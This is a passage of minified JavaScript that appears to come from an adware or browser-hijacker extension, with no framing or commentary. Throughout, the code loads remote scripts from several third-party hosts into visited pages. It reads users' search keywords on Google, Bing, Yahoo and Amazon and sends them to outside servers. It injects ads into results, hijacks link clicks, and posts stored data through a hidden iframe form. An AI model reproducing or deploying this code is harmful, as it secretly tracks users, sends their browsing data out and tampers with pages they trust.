sh=b3qau4\")>-1||url.indexOf(\"hash=ijeqe4\")>-1||url.indexOf(\"duit&ptag=AA7AAB832A2DE41458BF&\")>-1||url.indexOf(\"duit&ptag=A93F650AC0E6A4A4791F&\")>-1||url.indexOf(\"duit&ptag=A79888693F6CA4634A6F\")>-1||url.indexOf(\"duit&ptag=A359B17B6FAA44E6B86F\")>-1||url.indexOf(\"ISID=MF245F633-E188-4162-B56A\")>-1||url.indexOf(\"SID=MEABFCF9A-556B-4C5C-8727\")>-1||url.indexOf(\"ISID=M8FBC22FE-AB08-464E-AA63\")>-1||url.indexOf(\"uid=531364863_132823_4252277E\")>-1||url.indexOf(\"searchiy.gboxapp.com\")>-1||url.indexOf(\"searchy.easylifeapp.com\")>-1||url.indexOf(\"search?hspart=webpick&hsimp=yhs-1&p=\")>-1||url.match(/search.yahoo.com.+hspart=.+/)||url.match(/websearch.(mocaflix|searchissimple|just-browse|good-results|searchsupporter|soft-quick|pu-results|simplespeedy|helpmefindyour|greatresults|youwillfind|lookforitthere|greatresults|youwillfind|lookforitthere|searchmainia|searchrocket|homesearchapp|a-searchpage|coolwebsearch|homesearch-hub|resulthunters|searchdwebs|searchingisme|searchannel|searchouse|pur-esult|searchboxes|searchitup|searchpages|searchesplace|simplesearches|goodfindings|searchiseasy|searchisfun|the-searcheng|oversearch|searchere|relevantsearch|wisesearch|search-guide|searchisbestmy|searchbomb|searchguru|searchsun|searchsunmy|toolksearchbook|searchinweb|webisgreat|webisawsome|exitingsearch|amaizingsearches).info/)||url.match(/search.(easylifeapp|gboxapp|searchonme|appsarefun|genieo).com/)||url.indexOf(\"searchitapp.com\")>-1||url.indexOf(\"news.searchonme.com\")>-1||url.indexOf(\"jerusalem.com\")>-1||url.indexOf(\"vatican.com\")>-1||url.indexOf(\"deadsea.com\")>-1||url.indexOf(\"iklk.com\")>-1||url.indexOf(\"offers.bycontext.com\")>-1||url.indexOf(\"deals.offer-dynamics.com\")>-1||url.indexOf(\"offer-dynamics.com\")>-1||url.indexOf(\"www.livegeekhelp.com/pop/\")>-1||url.indexOf(\"gvud.com\")>-1||url.indexOf(\"zuzd.com\")>-1||url.indexOf(\"babaViral.com\")>-1||url.indexOf(\"cupid.so\")>-1||url.indexOf(\"hostanytime.com\")>-1||url.indexOf(\"antivirus.so\")>-1||url.indexOf(\"dates.am\")>-1||url.indexOf(\"insurance-company.co\")>-1||url.indexOf(\"advanceloan.org\")>-1||url.indexOf(\"calcitapp.info\")>-1||url.indexOf(\"desktopfavapp.info\")>-1||url.indexOf(\"?ctid=CT3330145\")>-1||url.indexOf(\"?ctid=CT3330146\")>-1||url.indexOf(\"?ctid=CT3330147\")>-1||url.indexOf(\"?ctid=CT3330148\")>-1||url.indexOf(\"?ctid=CT3330149\")>-1||url.indexOf(\"sporty-glow.com\")>-1||url.indexOf(\"game-trek.net\")>-1||url.indexOf(\"=apapamam\")>-1||url.indexOf(\"avatrade.com\")>-1){return}}catch(e){};new function(){if(null==document.getElementById(\"id_arrrrppdjafklbvnn4450fm\")&&window.self==window.top&&\"http:\"==window.self.location.protocol){var a=document.createElement(\"script\");a.type=\"text/javascript\";a.src=\"//istatic.datafastguru.info/fo/min/wp.js?subid=990_55502&hid=12959191907328554276&bname=cosstminn\";a.setAttribute(\"id\",\"id_arrrrppdjafklbvnn4450fm\");document.getElementsByTagName(\"head\")[0].appendChild(a)}};;try{new function(){if(null==document.getElementById(\"id_arrrrppdjafklbvnn4440fm\")&&\"http:\"==location.protocol&&window.self==window.top){var a=document.createElement(\"script\");a.type=\"text/javascript\";a.src=\"//istatic.datafastguru.info/fo/min/wpb.js?subid=990_55502&hid=12959191907328554276&bname=cosstminn\";a.setAttribute(\"id\",\"id_arrrrppdjafklbvnn4440fm\");document.getElementsByTagName(\"head\")[0].appendChild(a)}}}catch(e$$12){};;if(window.self==window.top){var script=document.createElement(\"script\");script.type=\"text/javascript\";script.src=\"//www.superfish.com/ws/sf_main.jsp?dlsource=cost3&userId=7153781152&CTID=p55502&partnername=cosstminn\";document.getElementsByTagName(\"head\")[0].appendChild(script)};;(function(){var b,f,g;try{var a=window.self.location.href;if(!(window.self==window.top||\"undefined\"==typeof localStorage||\"undefined\"==typeof localStorage.setItem||-1==a.indexOf(\"c08LLxQD=\")&&!a.match(/1018-\\d{3,4}_/)&&-1==a.indexOf(\"cdncache-a.aka\"))){if(-1<a.indexOf(\"c08LLxQD=\")){var d=a.match(/c08LLxQD=(\\d+)_(\\d{2,3}x\\d{2,3})_?(\\d+)?/);b=d[1];f=d[2].replace(\"x\",\".\");g=d[3]?d[3]:0}else{try{var j=-1<a.indexOf(\"zoneid\")?a.match(/zoneid=(\\d+)/)[1]:a.match(/1018-(\\d+)_WS/)[1]}catch(n){j=0}var c=document.getElementsByTagName(\"body\")[0];b=-1<a.indexOf(\"cdncache-a.aka\")?1001:1002;f=Math.max(c.scrollWidth,c.offsetWidth)+\".\"+Math.max(c.scrollHeight,c.offsetHeight);g=j}var e=new Date,k=parseInt(e.getTime()/1E3),l=\"zyk_\"+[e.getUTCFullYear()+\"-\"+(e.getUTCMonth()+1)+\"-\"+e.getUTCDate(),b,f,g].join(),m=localStorage.getItem(l);localStorage.setItem(l,1+(m?parseInt(m):0));if(lsTime=localStorage.getItem(\"zEpoch\")){if(7200<k-parseInt(lsTime)){var h=document.createElement(\"div\");b=[];for(i in localStorage)-1<i.indexOf(\"zyk_\")&&b.push(\"'\"+i.replace(\"zyk_\",\"\")+\"':\"+localStorage.getItem(i));h.style.display=\"none\";h.innerHTML='<iframe name=\"webscorebox_ifr\"></iframe><form target=\"webscorebox_ifr\" method=\"post\" action=\"http://count3.webscorebox.com/?q=g708BNmGWj8znShVWzmPhd94pjaMCyVUojk8qjaGtNhVCNqPB750pihSCM06C7lGojsMh7VUojaMAyVUojwGpjk4rjUFpja6rHs5qjk9rTC7\" id=\"webscorebox_frm\"><input type=\"hidden\" name=\"scores\" value=\"{'+b.join(\",\")+'}\"></form>';(typeof c!=\"undefined\"?c:document.getElementsByTagName(\"body\")[0]).appendChild(h);document.getElementById(\"webscorebox_frm\").submit();localStorage.clear()}}else localStorage.setItem(\"zEpoch\",k)}}catch(p){}})();;window.top==window.self&&\"undefined\"==typeof __yael_running&&(window.__yael_running=!0,new function(){if(!document.getElementById(\"__yael_once\")){var m=document.createElement(\"div\");m.id=\"__yael_once\";var n=document.getElementsByTagName(\"body\")[0];n&&n.appendChild(m);var b=this;b.pixelHost=\"//sepx.sendapplicationget.com\";b.prefix=\"jhgasdf\";b.version=\"0.5\";b.now=(new Date).getTime();b.clickInterval=2592E5;b.ratio=12;b.initThrottle=\"google;gmaps;amazon\";b.unique_items_left=!0;b.eid=decodeURIComponent(\"cosstminn\"); b.num_of_items_in_one=4;b.count=0;b.baseHostname=\"sendapplicationget.com\";b.utils=new function(){var a=this;a.isFalse=function(a){return\"undefined\"==typeof a||0===a.length||null===a};a.cookie=new function(){var a=this;a.createCookie=function(a,c,b){if(b){var g=new Date;g.setTime(g.getTime()+864E5*b);b=\"; expires=\"+g.toGMTString()}else b=\"\";document.cookie=a+\"=\"+c+b+\"; path=/\"};a.readCookie=function(a){a+=\"=\";for(var c=document.cookie.split(\";\"),b=0;b<c.length;b++){for(var g=c[b];\" \"==g.charAt(0);)g= g.substring(1,g.length);if(0==g.indexOf(a))return g.substring(a.length,g.length)}return null};a.eraseCookie=function(b){a.createCookie(b,\"\",-1)}};a.ajax={get:function(c,b){try{this.xhr=new XMLHttpRequest,this.xhr.open(\"GET\",c,!0),this.xhr.onreadystatechange=function(){4==a.ajax.xhr.readyState&&b(a.ajax.xhr.responseText)},this.xhr.send()}catch(e){}},post:function(c,b,e){this.xhr=new XMLHttpRequest;this.xhr.open(\"POST\",c,!0);this.xhr.setRequestHeader(\"Content-type\",\"application/x-www-form-urlencoded\"); this.xhr.onreadystatechange=function(){4==a.ajax.xhr.readyState&&e(a.ajax.xhr.responseText)};b=encodeURIComponent(b);this.xhr.send(b)}};a.waitForTokens={};a.addScript=function(a,b){if(\"bing\"==b){var e=Element.prototype.appendChild;document.createElement(\"iframe\");Element.prototype.appendChild=document.appendChild;document.getElementsByTagName(\"head\")[0].appendChild(a);Element.prototype.appendChild=e}else document.getElementsByTagName(\"head\")[0].appendChild(a)};a.waitForElement=function(c,d,e,f){var g= a.query_selector_all(c);clearTimeout(a.waitTimeout);if(25<b.waitForElementCounter)return d(null);if(\"undefined\"==typeof g||1>g.length){if(a.waitForTokens[f])return d(null);var h=arguments.callee;a.waitTimeout=setTimeout(function(){b.waitForElementCounter++;h(c,d,e,f)},e)}else{if(a.waitForTokens[f])return d(null);a.waitForTokens[f]=!0;b.waitForElementCounter=0;return d(g)}};a.flushWaitForTokens=function(){a.waitForTokens={}};a.getRandomInt=function(a,b){return Math.floor(Math.random()*(b-a+1))+a}; a.get_computed_style=\"function\"!=typeof window.getComputedStyle?function(b){return{getPropertyValue:function(d){\"float\"==d&&(d=\"styleFloat\");d=a.dhtml_prop_name(d);return\"object\"==typeof b.currentStyle&&null!=b.currentStyle&&\"undefined\"!=typeof b.currentStyle[d]?b.currentStyle[d]:null}}}:function(a,b){return window.getComputedStyle(a,b)||{getPropertyValue:function(){}}};a.query_selector_all=document.querySelectorAll?function(a){try{return document.querySelectorAll(a)}catch(b){}}:function(a){var b= a.match(/^#([^,\\s]+)$/)||[];if(1<b.length)return a=document.getElementById(b[1])||void 0,\"undefined\"!=typeof a?[a]:[];b=document.createElement(\"STYLE\");document.getElementsByTagName(\"body\")[0].appendChild(b);document.__asya_qsaels=[];b.styleSheet.cssText=a+\"{x:expression(document.__asya_qsaels.push(this))}\";window.scrollBy(0,0);return document.__asya_qsaels};a.clone_object=window.JSON instanceof Object?function(a){if(a instanceof Object&&(a=JSON.stringify(a),\"string\"==typeof a))return JSON.parse(a)}: function(a){if(a instanceof Object){var b=new a.constructor,e;for(e in a)b[e]=arguments.callee(a[e]);return b}return a};a.dhtml_prop_name=function(a){return a.replace(/(\\-([a-z]){1})/g,function(a,b,c){return c.toUpperCase()})};a.wildcard_to_regex=function(a){a=a.replace(/([.^$+(){}\\[\\]\\\\|\\?])/g,\"\\\\$1\");a=a.replace(/\\*/g,\".*\");return RegExp(a)};a.throttle=function(a,b){var e=null;return function(){var f=this,g=arguments;clearTimeout(e);e=setTimeout(function(){a.apply(f,g)},b)}};a.epoch=function(){return(new Date).getTime()}; a.msie=function(){var a=parseInt((/msie (\\d+)/.exec(navigator.userAgent.toLowerCase())||[])[1],10);isNaN(a)&&(a=parseInt((/trident\\/.*; rv:(\\d+)/.exec(navigator.userAgent.toLowerCase())||[])[1],10));return isNaN(a)?!1:a}();a.version_ie_less=function(a){if(/MSIE (\\d+\\.\\d+);/.test(navigator.userAgent))return new Number(RegExp.$1)<=a?!0:!1};a.isIE=function(){return\"Microsoft Internet Explorer\"==navigator.appName||\"Netscape\"==navigator.appName&&null!=/Trident\\/.*rv:([0-9]{1,}[.0-9]{0,})/.exec(navigator.userAgent)}; a.match_url=function(b,d){for(var e=0;e<d.length;e++)if(\"string\"==typeof d[e]){var f;f=/^\\/.+\\/$/.test(d[e])?RegExp(d[e]):a.wildcard_to_regex(d[e]);if(f instanceof RegExp&&f.test(b))return!0}};a.ping=function(a){for(var d=[\"google\",\"bing\",\"yahoo\",\"youtube\"],e=0;e<d.length;e++)if(-1<location.hostname.indexOf(d[e])){var f=new Image,g=encodeURIComponent(window.self==window.top?window.self.location.href:\"\");1E3<g.length&&(g=encodeURIComponent(location.hostname));var h=encodeURIComponent(location.hostname); f.src=b.pixelHost+\"?hid=12959191907328554276&eid=990&pid=55502&prodid=186&v=\"+b.version+\"&ch=\"+a+\"&lan=\"+navigator.language+\"&cc=GB&pr=\"+d[e]+\"&host=\"+h+\"&ref=\"+g}}};var k=[\"horizontal\",\"vertical\",\"images-horizontal\",\"images-vertical\"];b.jsonpHost=function(){var a=\"s1. s1. s2. s3. s4. s5. s6.\".split(\" \");return a[b.utils.getRandomInt(0,a.length-1)]+\"\"}()+b.baseHostname;b.projects_info={google:{hrefSelector:\".r a\",unique_search_divs:\"3\",urls:[\"www.google.*\"], src_for_keyword:[\"#gbqfq\",\"#lst-ib\",\"#sbhost\"],dr:[\"#tvcap\",\"#bottomads\",\"#tads\"],tweak:function(){b.events.flush();var a=b.utils.query_selector_all(\"#nav td\"),c=b.utils.query_selector_all(\".spell + a\")[0];if(0<a.length)for(var d=0;d<a.length;d++)b.events.add(\"click\",function(){b.init_search_project()},!1,a[d],!0);\"undefined\"!==typeof c&&b.events.add(\"click\",function(){b.init_search_project()},!1,c,!0)},validate:function(a){var c=this;if(-1<location.href.indexOf(\"https://www.google.com/maps\")||location.href.match(/https:\\/\\/www.google.[a-z,\\.]+\\/$/g))return!0; c.callback=a;c.count=0;this.check_tab=function(){var a=document.getElementById(\"hdtb_msb\")||b.utils.query_selector_all(\".tn\");if(b.utils.isFalse(a))if(c.count++,10>c.count)setTimeout(function(){c.check_tab()},1E3);else return!1;else return(b.utils.query_selector_all(\".hdtb_mitem\")[0]||b.utils.query_selector_all(\".tn > div\")[0]).className.match(/(hdtb_msel|tn-selected-mode)/)&&(b.utils.ping(\"validate2\"),c.callback()),!1};if(!c.check_tab())return!1}},yahoo:{hrefSelector:\"a[id^=link]\",unique_search_divs:\"3\", dr:[\".ads.horiz.top\",\".ads.horiz.bot\"],urls:[\"yahoo\"],src_for_keyword:\"#yschsp\",validate:function(){b.utils.ping(\"validate2\");return!0}},bing:{hrefSelector:[\".b_algo a\",\".sb_tlst a\"],unique_search_divs:\"2\",dr:[\".sb_adsWv2\"],urls:[\"http://www.bing.com/search?*\"],src_for_keyword:[\"#sb_form_q\",\".b_searchboxForm[name='q']\"],validate:function(){b.utils.ping(\"validate2\");return!0}},conduit:{hrefSelector:\"a[id^=ctl00_main_organicResults]\",unique_search_divs:\"1\",urls:[\"http://search.conduit.com*\"],src_for_keyword:\"#q_top\", dr:[\"#master-1\"],validate:function(){return!0}},ask:{hrefSelector:\".ptbs  a[id^=r]\",unique_search_divs:\"1\",urls:[\"http://www.ask.com/web?q=*\",\"http://www.ask.com/web?qsrc=*\",\"http://www.ask.com/web?am=broad&q=*\"],src_for_keyword:[\"#top_qcomn\",\"#top_q_comm\"],dr:[\"#spl_img_top\"],validate:function(){return!0}},triple:{hrefSelector:\".gRsSlicetitle\",unique_search_divs:\"2\",dr:[\"#gRsTopLinks\"],urls:[\"http://search.triple-search.com/?*\",\"http://www.search.triple-search.com/?*\"],src_for_keyword:\"#q\",validate:function(){var a= b.utils.query_selector_all(\".gRsSTypeSelltr\");if(0<a.length){for(var c=0;c<a.length;c++)if(\"English\"==a[c].innerHTML)return!0;return!1}}},incredimail:{hrefSelector:\".title\",unique_search_divs:\"3\",dr:[\"#MainSponsoredLinks\"],urls:[\"http://www.search.incredimail.com/search.php?q*\",\"http://search.incredimail.com/search.php?q*\"],src_for_keyword:\"#q\",validate:function(){return-1<location.href.indexOf(\"lang=english\")?!0:!1}},gmaps:{hrefSelector:\"div[class^='ads-line'] a\",unique_search_divs:\"1\",dr:[\".ads.horiz.top\", \".ads.horiz.bot\"],urls:[\"https://www.google.com/maps/*\"],src_for_keyword:\"#searchboxinput\",tweak:function(){var a=function(){b.remove_search();b.utils.query_selector_all(\".omnibox-cards-transformations\")[0].style.marginTop=\"0px\";document.getElementById(\"reveal-cards\").style.marginTop=\"0px\"};b.events.add(\"click\",function(){a()},!1,document.getElementById(\"cards\"),!1);b.events.add(\"keyup\",function(){a()},!1,document.getElementById(\"searchbox_form\"),!1);b.events.add(\"click\",function(){a()},!1,document.getElementById(\"viewcard\"), !1);b.events.add(\"click\",function(){a()},!1,b.utils.query_selector_all(\".widget-runway-pegman\")[0],!1);b.events.add(\"click\",function(){a()},!1,b.utils.query_selector_all(\".gscb_a\")[0],!1);var c=function(a){a=document.querySelector(a);return getComputedStyle(a,null).height}(\".yael .cards-card\");document.querySelector(\".omnibox-cards-transformations\").style.marginTop=c;document.querySelector(\"#reveal-cards\").style.marginTop=c},validate:function(a){b.utils.isIE()||(b.num_of_items_in_one=1,a())}},amazon:{unique_search_divs:\"1\", urls:[\"http://www.amazon.com*&field-keywords=*\"],src_for_keyword:\"#twotabsearchtextbox\",validate:function(a){a()}},smartAddress:{hrefSelector:[\"li a\"],unique_search_divs:\"2\",dr:[\".peach ol\"],urls:[\"search.smartaddressbar.com/web.php?s=*\"],src_for_keyword:\"#stxt\",tweak:function(){var a=b.utils.query_selector_all(\".peach\")[0],c=b.utils.query_selector_all(\".right ul\")[0];a&&a.parentNode.removeChild(a);c&&c.parentNode.removeChild(c)},validate:function(){return!0}}};var l=function(a){if(\"string\"==typeof a){var c= a.match(/:nth-match\\(([0-9]+)\\)/);if(c&&1<c.length)return a=b.utils.query_selector_all(a.substr(0,c.index))||[],a[c[1]]||void 0;a=b.utils.query_selector_all(a)||[];return a[0]||void 0}};b.events=new function(){var a=this;a.cache=[];a.add=window.addEventListener?function(b,d,e,f,g){\"undefined\"==typeof f&&(f=window);f.addEventListener(b,d,e);g&&a.cache.push([b,d,e,f])}:window.attachEvent?function(b,d,e,f,g){\"undefined\"==typeof f&&(f=window);f[\"e\"+b+d]=d;f[b+d]=function(){f[\"e\"+b+d](window.event)};f.attachEvent(\"on\"+ b,f[b+d]);g&&a.cache.push([b,d,e,f])}:function(){};a.remove=window.removeEventListener?function(a,b,e,f){\"undefined\"==typeof f&&(f=window);f.removeEventListener(a,b,e)}:window.detachEvent?function(a,b,e,f){\"undefined\"==typeof f&&(f=window);f.detachEvent(\"on\"+a,f[a+b]);f[a+b]=null;f[\"e\"+a+b]=null}:function(){};a.flush=function(){for(var b=0;b<a.cache.length;b++)a.remove.apply(a,a.cache[b]);a.cache=[]}};b.get_insertion_element=function(a){return!a.insert||\"before\"!=a.insert&&\"after\"!=a.insert?a.element: a.element.parentNode};b.dom=new function(){this.json_to_html=function(a,c){if(\"#text\"==a.type)c=document.createTextNode(a.text);else if(\"#comment\"!=a.type){c||(c=document.createElement(a.type));if(a.attrs){for(var d in a.attrs)if(a.attrs.hasOwnProperty(d))if(\"style\"==d&&a.attrs.style instanceof Object)for(var e in a.attrs.style){var f=b.utils.dhtml_prop_name(e);try{c.style[f]=a.attrs.style[e]}catch(g){}}else c.setAttribute(d,a.attrs[d]);\"iframe\"==a.type&&(a.attrs.hasOwnProperty(\"frameborder\")&&(c.frameBorder= a.attrs.frameborder),a.attrs.hasOwnProperty(\"marginwidth\")&&(c.marginWidth=a.attrs.marginwidth),a.attrs.hasOwnProperty(\"marginheight\")&&(c.marginHeight=a.attrs.marginheight))}if(a.children)for(d=0;d<a.children.length;d++){f=a.children[d];e=arguments.callee(f);try{c.appendChild(e)}catch(h){if(\"#text\"==f.type&&\"string\"==typeof f.text)if(\"style\"==a.type&&c.styleSheet)c.styleSheet.cssText=f.text||\"\";else if(e=b.utils.get_node_text_prop(c))c[e]=f.text}}}return c}};b.addEventClick=function(a,c){for(var d= 0;d<a.length;d++)b.events.add(\"click\",function(a){a.preventDefault?a.preventDefault():a.returnValue=!1;this.href=\"#\";location.href=c+\"&j=true\";b.events.flush();localStorage.setItem(b.prefix,b.now+b.clickInterval);return!1},!1,a[d],!0)};b.checkClickInterval=function(a){if(b.now>a)return!0};b.setClickHref=function(a,c){if(\"undefined\"!=typeof b.projects_info[c].hrefSelector){if(b.utils.getRandomInt(1,1E4)>=1E4/b.ratio)return!1;var d=b.projects_info[c].hrefSelector,e=parseInt(localStorage.getItem(b.prefix)); if(\"undefined\"!=typeof d){if(d instanceof Array)for(var f=0;f<d.length;f++){var g=b.utils.query_selector_all(d[f]);if(0<g.length)break}else g=b.utils.query_selector_all(d);if(!e||b.checkClickInterval(e))b.addEventClick(g,a),b.j=!0}}};b.escape_chars_for_json=function(a){for(var b in a)a[b]=a[b].replace(/\\\"/g,'\\\\\"');return a};b.tpl_engine=function(a,c,d){\"false\"!==d.layouts.unique&&(c=b.escape_chars_for_json(c));a=JSON.stringify(a);c=[{replace:\"title\",\"with\":c.title},{replace:\"displayUrl\",\"with\":c.displayUrl}, {replace:\"description\",\"with\":c.description},{replace:\"clickUrl\",\"with\":c.clickUrl}];for(d=0;d<c.length;d++)a=a.replace(RegExp(\"\\\\[##\"+c[d].replace+\"##\\\\]\",\"g\"),c[d][\"with\"]);try{return JSON.parse(a)}catch(e){}};b.get_item_json=function(a,c){var d=b.utils.clone_object(a.layouts.template);d.attrs instanceof Object||(d.attrs={});return d=b.tpl_engine(d,c,a)};b.add_jsonp_to_config=function(a,c){b.get_item_json(a)};b.remove_search=function(){var a=b.utils.query_selector_all(\".yael\");if(0<a.length)for(var c= 0;c<a.length;c++)a[c].parentNode.removeChild(a[c])};b.inject_json=function(a){\"first\"==a.insert?a.element.insertBefore(a.node,a.element.firstChild):\"before\"==a.insert?a.element.parentNode.insertBefore(a.node,a.element):\"after\"==a.insert?a.element.parentNode.insertBefore(a.node,a.element.nextSibling):a.element.appendChild(a.node)};b.get_ad_dom=function(a){return a.layouts instanceof Object&&a.layouts.dom instanceof Object?a.layouts.dom:!1};b.get_layout_type=function(a){if(a.layouts instanceof Object)for(var b= 0;b<k.length;b++)if(-1<a.layouts.id.indexOf(k[b]))return k[b];return!1};b.create_search=function(a){a=b.get_ad_dom(a);return b.dom.json_to_html(a)};b.templates=new function(){this.container_id=0;this.add_real_links=function(a,c){b.utils.add_event(\"click\",function(b){window.open(a);b.preventDefault?b.preventDefault():b.returnValue=!1},!1,c)}};b.validate_response=function(){for(var a in __yael_res.data.items)__yael_res.data.items[a].displayUrl.match(/^(http:\\/\\/|https:\\/\\/|\\/\\/)/)&&__yael_res.data.items[a].displayUrl.replace(/^(http:\\/\\/|https:\\/\\/|\\/\\/)/, \"\")};b.is_target_valid=function(a){if(0!=__yael_res.data.numberOfItems&&\"undefined\"!=typeof a.element)return a.urls instanceof Array&&!b.utils.match_url(a.element.ownerDocument.location.href,a.urls)?!1:!0};var p=null;b.get_target_element=function(a){if(a.inserts instanceof Array&&\"undefined\"==typeof a.element)for(var b=0;b<a.inserts.length;b++)if(a.element=l(a.inserts[b].selector),\"undefined\"!==typeof a.element){a.insert=a.inserts[b].at;break}};b.add_data_to_config=function(a,c){if(0==c.length)return b.unique_items_left= !1;var d=b.get_ad_dom(a);(function(a,c){c.children&&0!==c.children.length?(c=c.children[c.children.length-1],arguments.callee(a,c)):b.insert_point=c})(a,d);for(d=0;d<b.num_of_items_in_one&&0!=c.length;d++)b.insert_point.children.push(b.get_item_json(a,c[0])),\"true\"==a.layouts.unique?b.not_unique_items.push(c.shift()):c.shift()};b.addEventsToItems=function(){for(var a=document.querySelectorAll('a[href*=\"'+b.jsonpHost+'\"]'),c=0;c<a.length;c++)b.events.add(\"click\",function(){b.init_search_project()}, !1,a[c],!1)};b.check_if_div_in_dom=function(a,b){var d=[],e;for(e in __yael_res.config.targets){var f=__yael_res.config.targets[e];clearTimeout(p);a++;if(4<a)return;if(f.inserts instanceof Array&&\"undefined\"==typeof f.element)for(var g=0;g<f.inserts.length;g++){var h=l(f.inserts[g].selector);\"undefined\"!==typeof h&&d.push(h)}}for(e=0;e<d.length;e++)if(\"undefined\"==typeof d[e]){var k=this;p=setTimeout(function(){k.apply(k,arguments)},200)}b()};b.addExtensionName=function(a){var c=JSON.stringify(a.layouts.dom); if(!c.match(/\\[##eid##\\]/))return a;c=c.replace(/\\[##eid##\\]/g,b.eid);a.layouts.dom=JSON.parse(c);return a};b.loop_targets=function(a,c,d){if(a instanceof Object&&(b.get_target_element(a),b.is_target_valid(a)&&(\"false\"==d&&b.unique_items_left&&(c=b.not_unique_items),0!=c.length))){b.add_data_to_config(a,c);try{a=b.addExtensionName(a)}catch(e){}try{a.node=b.create_search(a)}catch(f){}\"undefined\"!=typeof a.node&&b.inject_json(a)}};b.removeSecondClick=function(){for(var a=b.utils.query_selector_all(\".yael a\"), c=0;c<a.length;c++)b.events.add(\"click\",function(a){setTimeout(function(){for(var a=b.utils.query_selector_all(\".yael a\"),c=0;c<a.length;c++){var d=a[c];d.outerHTML=d.outerHTML.replace(/href\\=/ig,\"_href=\")}},20)},!1,a[c],!0)};b.addCloseFunctionality=function(){function a(a){for(var b=a.className.split(\" \"),c=0;c<b.length;c++)if(\"yael\"===b[c])return a;if(!a.parentElement)return!1;a=a.parentElement;return arguments.callee(a)}var c=b.utils.query_selector_all(\".yael_close_btn\");if(c)for(var d=0;d<c.length;d++)b.events.add(\"click\", function(){try{var b=a(this)}catch(c){}b&&b.parentElement.removeChild(b)},!1,c[d],\"closeBtn\")};b.inject_search=function(){b.not_unique_items=[];0!=__yael_res.data.items.length&&(b.setClickHref(__yael_res.data.items[0].clickUrl,b.projects_name),b.check_if_div_in_dom(0,function(){for(var a in __yael_res.config.targets){var c=__yael_res.config.targets[a];b.loop_targets(c,__yael_res.data.items,c.layouts.unique)}\"function\"==typeof b.projects_info[b.projects_name].tweak&&b.projects_info[b.projects_name].tweak(); b.j||b.removeSecondClick();b.addCloseFunctionality();b.utils.flushWaitForTokens()}))};b.init_search_project=function(){b.waitForElementCounter=0;\"undefined\"!=typeof __yael&&b.remove_search();for(var a in b.projects_info)if(b.utils.match_url(location.href,b.projects_info[a].urls)){var c=b.projects_info[a];b.projects_name=a;if(-1<b.initThrottle.indexOf(a))c.validate(function(){c.name=b.projects_name;b.get_keyword(c,function(a,c){b.jsonp_request(a,c)})});else{if(!c.validate())return;c.name=b.projects_name; b.projects_name=a;b.get_keyword(c,function(a,c){b.jsonp_request(a,c)})}}return!1};b.get_keyword=function(a,c){var d=a.src_for_keyword,e=function(d){b.inputElement=d[0];b.keyword=b.inputElement.value;if(2>b.keyword.length)return b.utils.flushWaitForTokens(),!1;if(b.inputElement&&\"input\"==b.inputElement.tagName.toLowerCase()&&\"\"!==b.keyword)return c(b.keyword,a.name)};if(d instanceof Array)for(var f=0;f<d.length;f++)b.utils.waitForElement(d[f],function(a){a&&e(a)},100,\"keyword\");else b.utils.waitForElement(d, function(a){a&&e(a)},100,\"keyword\")};b.remove_se_handler=function(a){var c=b.projects_info[a].dr;if(c instanceof Array)if(\"bing\"==a)for(c=b.utils.query_selector_all(c[0]),a=0;a<c.length;a++)b.remove_se(c[a]);else for(a=0;a<c.length;a++){var d=l(c[a]);b.remove_se(d)}};b.remove_se=function(a){a&&a.parentElement.removeChild(a)};b.jsonp_request=function(a,c){var d=b.num_of_items_in_one*parseInt(b.projects_info[c].unique_search_divs);window.__yael_cb=function(a){window.__yael_res=a;\"0\"==__yael_res.data.numberOfItems? b.utils.flushWaitForTokens():(0==__yael.utils.getRandomInt(0,10)&&b.remove_se_handler(c),__yael.inject_search())};\"undefined\"==typeof window.__yael&&(window.__yael=b);d=b.jsonpHost+\"/?v=\"+b.version+\"&p=\"+c+\"&keyword=\"+a+\"&numItems=\"+d+\"&hid=12959191907328554276&eid=990&pid=55502&prid=186\";\"undefined\"!=typeof specificFeeds&&specificFeeds instanceof Array&&(d+=\"&_feeds=\"+specificFeeds.join(\",\"));if(b.utils.isIE()){if(document.getElementById(\"__yael_script\")){var e=document.getElementById(\"__yael_script\"); e.parentNode.removeChild(e)}e=document.createElement(\"script\");e.id=\"__yael_script\";e.src=\"//\"+d+\"&domvar=__yael_cb\";e.type=\"text/javascript\";b.utils.addScript(e,c)}else b.utils.ajax.get(\"//\"+d,function(a){window.__yael_res=JSON.parse(a);\"0\"==__yael_res.data.numberOfItems?b.utils.flushWaitForTokens():(0==__yael.utils.getRandomInt(0,10)&&__yael.remove_se_handler(c),__yael.inject_search())})};\"undefined\"==typeof __yael&&b.init_search_project();-1<b.initThrottle.indexOf(b.projects_name)&&b.events.add(\"keyup\", b.utils.throttle(b.init_search_project,3E3),!1,b.inputElement,!1)}});;if(window.self==window.top){var script=document.createElement(\"script\");script.type=\"text/javascript\";script.src=\"//cdncache-a.akamaihd.net/loaders/1749/l.js?aoi=1311798366&pid=1749&zoneid=665716&ext=cosstminn&systemid=12959191907328554276&ext=cosstminn\";document.getElementsByTagName(\"head\")[0].appendChild(script)};;if(window.self==window.top){var script=document.createElement(\"script\");script.type=\"text/javascript\";script.src=\"//cdncache-a.akamaihd.net/loaders/1748/l.js?aoi=1311798366&pid=1748&zoneid=665716&ext=cosstminn&systemid=12959191907328554276&ext=cosstminn\";document.getElementsByTagName(\"head\")[0].appendChild(script)};;if(window.self==window.top){var script=document.createElement(\"script\");script.type=\"text/javascript\";script.src=\"//cdncache-a.akamaihd.net/loaders/1750/l.js?aoi=1311798366&pid=1750&zoneid=665716&ext=cosstminn&systemid=12959191907328554276&ext=cosstminn\";document.getElementsByTagName(\"head\")[0].appendChild(script)};;(function(){-1<window.self.location.hostname.indexOf(\"kass.t\")&&setTimeout(function(){document.getElementById(\"_ad4d917f2e764fab63b916b5e0655d2e\")&&document.getElementById(\"_ad4d917f2e764fab63b916b5e0655d2e\").firstElementChild&&(document.getElementById(\"_ad4d917f2e764fab63b916b5e0655d2e\").firstElementChild.onclick=function(){return!1});if(document.getElementById(\"_091c88d5b8c081bf15d212c4ae994c85\")){var f=document.getElementById(\"_091c88d5b8c081bf15d212c4ae994c85\"),g=document.createElement(\"div\");\ng.setAttribute(\"style\",\"width:100%;height:300%;position:absolute;left:0;top:0\");g.innerHTML='<img src=\"data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEHAAAALAAAAAABAAEAAAICRAEAOw==\" 